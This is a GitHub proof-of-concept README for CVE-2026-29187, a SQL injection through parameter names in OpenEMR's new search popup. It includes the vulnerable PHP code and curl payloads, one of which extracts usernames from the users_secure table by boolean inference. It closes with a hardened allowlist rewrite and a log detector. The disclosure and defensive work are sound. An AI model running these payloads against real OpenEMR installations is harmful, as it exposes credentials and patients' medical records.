ChrisSub08/CVE-2026-29187_SqlInjectionVulnerabilityOpenEMR7.0.4

GitHub: ChrisSub08/CVE-2026-29187_SqlInjectionVulnerabilityOpenEMR7.0.4

PoC for the SQL injection vulnerability in the new search popup feature of OpenEMR versions below 8.0.0.3, showing how an authenticated attacker can extract sensitive database information by injecting through parameter names.

Stars: 0 | Forks: 0

# CVE-2026-29187 - SQL injection in the new search popup

### Summary

A SQL injection vulnerability exists in the new search popup of OpenEMR <8.0.0.3 and can be exploited by an authenticated attacker. It is caused by insufficient input validation in the new search popup feature.

### Details

The vulnerability lies in the new search popup feature, where user-supplied input is concatenated directly into the SQL query's select relevance column and where condition without proper sanitization. This allows an attacker to inject malicious SQL code. Specifically, the part of each `mf_*` request parameter name after the prefix is used as a column name: `add_escape_custom()` backslash-escapes quote characters for use inside a string literal, but it does not validate an identifier, so everything else in the name is placed into the query verbatim while the parameter value is bound safely.

The vulnerability affects the following lines:

- `interface/new/new_search_popup.php` [line 141](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L141)
- `interface/new/new_search_popup.php` [line 134](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L134) and [line 136](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L136)
- `interface/new/new_search_popup.php` [line 125](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L125) and [line 128](https://github.com/openemr/openemr/blob/7f27cbd146104b9adaffc4be3bd1185c28505873/interface/new/new_search_popup.php#L128)

```
foreach ($_REQUEST as $key => $value) {
    if (!str_starts_with((string) $key, 'mf_')) {
        continue; // "match field"
    }
    $fldname = substr((string) $key, 3);
    // pubpid requires special treatment. Match on that is fatal.
    if ($fldname == 'pubpid') {
        $relevance .= " + 1000 * ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    } else {
        $relevance .= " + ( " . add_escape_custom($fldname) . " LIKE ? )";
        array_push($sqlBindArray, $value);
    }
    $where .= " OR " . add_escape_custom($fldname) . " LIKE ?";
    array_push($sqlBindArraySpecial, $value);
    echo "\n";
    ++$numfields;
}

$sql = "SELECT *, ( $relevance ) AS relevance, " .
    "DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS " .
    "FROM patient_data WHERE $where " .
    "ORDER BY relevance DESC, lname, fname, mname " .
    "LIMIT " . escape_limit($fstart) . ", " . escape_limit($MAXSHOW) . "";
$sqlBindArray = array_merge($sqlBindArray, $sqlBindArraySpecial);
$rez = sqlStatement($sql, $sqlBindArray);
```

```
SELECT *, ( 0 + ( LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```

### Proof of Concept (PoC)

```
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'https://172.18.0.3/interface/new/new_search_popup.php?mf_"=test'
SQL Statement failed on preparation: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100'

Query Error

ERROR: query failed: SELECT *, ( 0 + ( \" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR \" LIKE ? ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\" LIKE ? ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patien...' at line 1


/var/www/localhost/htdocs/openemr/interface/new/new_search_popup.php at 141:sqlStatement
┌──(kali㉿kali)-[~]
└─$ curl -k -b "OpenEMR=5cb438753a9513cb01f5adc257ab474f" 'http://172.18.0.3/interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%'
┌──(kali㉿kali)-[~]
└─$
```

Several techniques can be used to exploit this vulnerability; one of them is a boolean-based attack, which the last payload runs:

```
SELECT *, ( 0 + ( (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ) ) AS relevance, DATE_FORMAT(DOB,'%m/%d/%Y') as DOB_TS FROM patient_data WHERE 1 = 0 OR (SELECT(username)FROM(users_secure)) LIKE "ad_in%" ORDER BY relevance DESC, lname, fname, mname LIMIT 0, 100
```

### Impact

- Unauthorized access to database information
- Potential disclosure of sensitive medical information
- Server-side code execution (in some cases)
- Database compromise

### Vulnerability remediation process

1. Assess and verify the vulnerability
2. Request or assign a CVE ID
3. Create a private fork or private branch
4. Develop the fix
5. Write regression and security tests
6. Prepare release notes and a draft security advisory
7. Ship the fix (merge the code) and publish a patch release
8. Publicly disclose the vulnerability

### Credits

- Researcher: Christophe SUBLET
- Organization: Grenoble INP - Esisar, UGA
- Project: CyberSkills, Orion
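The defensive counterpart to the loop shown in the Details section, as an added example that is not part of this repository or of OpenEMR: the column name taken from an `mf_*` parameter is validated against an allowlist of identifiers instead of being escaped, and a small detector flags access-log requests to `new_search_popup.php` whose `mf_*` names are not plain identifiers. The `ALLOWED_COLUMNS` set and the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed subset of patient_data columns a search may match on (hypothetical allowlist).
ALLOWED_COLUMNS = {"fname", "lname", "mname", "DOB", "pubpid", "phone_home", "email"}
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def safe_field_name(key):
    """Map an mf_* request key to a column name only if it is an allowlisted identifier."""
    if not key.startswith("mf_"):
        return None
    fld = key[3:]
    # add_escape_custom() only escapes quotes inside string literals; it cannot make an
    # identifier safe, so the name itself must be validated rather than escaped.
    return fld if IDENT_RE.fullmatch(fld) and fld in ALLOWED_COLUMNS else None


def build_search_sql(params):
    """Hardened counterpart of the vulnerable loop: names from the allowlist, values bound."""
    relevance, where, rel_binds, where_binds = "0", "1 = 0", [], []
    for key, value in params.items():
        fld = safe_field_name(key)
        if fld is None:
            continue  # unknown or malformed column name: drop it instead of concatenating it
        weight = "1000 * " if fld == "pubpid" else ""  # same pubpid weighting as the original
        relevance += f" + {weight}( {fld} LIKE ? )"
        rel_binds.append(value)
        where += f" OR {fld} LIKE ?"
        where_binds.append(value)
    sql = f"SELECT *, ( {relevance} ) AS relevance FROM patient_data WHERE {where}"
    return sql, rel_binds + where_binds


def suspicious_mf_params(log_line):
    """Detection: mf_* names in a new_search_popup.php request that are not plain identifiers."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m or "new_search_popup.php" not in m.group(1):
        return []
    pairs = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    return [k for k, _ in pairs if k.startswith("mf_") and not IDENT_RE.fullmatch(k[3:])]


# Constructed access-log lines (Apache combined format); the last two carry the PoC requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /interface/new/new_search_popup.php?mf_lname=smith HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2026:10:00:01 +0000] "GET /interface/new/new_search_popup.php?mf_%22=test HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2026:10:00:02 +0000] "GET /interface/new/new_search_popup.php?mf_(SELECT(username)FROM(users_secure))=ad_in%25 HTTP/1.1" 200 512',
]
```

Only the `mf_lname` request passes the allowlist; the other two keys are dropped by `build_search_sql` and reported by `suspicious_mf_params`.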